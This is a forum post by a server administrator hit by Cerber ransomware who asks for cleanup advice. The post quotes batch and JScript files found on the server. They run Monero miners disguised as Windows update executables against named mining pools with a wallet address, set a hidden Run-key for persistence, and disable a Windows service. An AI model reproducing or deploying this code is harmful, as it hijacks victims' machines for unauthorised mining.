I have a server (2012) that was hit with Cerber 4/5 ransomware yesterday. I uploaded the ransom note and file to identify.
File names were changed to <random>.8ecd
I found the folder where the executable was and it has a few batch programs that ran to encrypt it. I didn't know if it contained the unlock key
Contents of 1.bat
KB890830.exe -t 1 -a cryptonight -o stratum+tcp://xmr-usa.dwarfpool.com:8005 -u 45GoL25ZEzi4F3cdJoH6cZ7Ufr65AqSyyGe6c87cuFC3DrFdDYFAjeq9conorAjzL5V24wRYigTjJDVzch6pNDRb7d7FMz9 -p x
pause
KB3199986.exe -t 1 -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 45GoL25ZEzi4F3cdJoH6cZ7Ufr65AqSyyGe6c87cuFC3DrFdDYFAjeq9conorAjzL5V24wRYigTjJDVzch6pNDRb7d7FMz9 -p x
pause
Contents of min.js
var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("c:/Users/Public/Music/jb-JP/aes/KB890830.exe -t 1 -a cryptonight -o stratum+tcp://xmr-usa.dwarfpool.com:8005 -u 45GoL25ZEzi4F3cdJoH6cZ7Ufr65AqSyyGe6c87cuFC3DrFdDYFAjeq9conorAjzL5V24wRYigTjJDVzch6pNDRb7d7FMz9 -p x", 0)WSHShell.Run("c:/Users/Public/Music/jb-JP/aes/KB3199986.exe -t 2 -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 45GoL25ZEzi4F3cdJoH6cZ7Ufr65AqSyyGe6c87cuFC3DrFdDYFAjeq9conorAjzL5V24wRYigTjJDVzch6pNDRb7d7FMz9 -p x", 0)
Contents of run.bat
Reg Add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MediaSVC" /t REG_SZ /d "c:\Users\Public\Music\jb-JP\aes\min.js" /f
pause
Contents of disable_UI0Detect.bat
sc config UI0Detect start= disabled
sc stop UI0Detectpause
I've run a virus scan it it has removed the KB*.exe files, though it left behind the batch and js. The registry entry in "run.bat" does not exist.
There were a few files that were hit that weren't part of the backup, so we've saved them in hopes of a decryption tool being released.
Any other steps I should take?
Looking at it again, I guess the long string was a username. Question still stands I guess
Edited by CCSC, 23 December 2016 - 10:31 AM.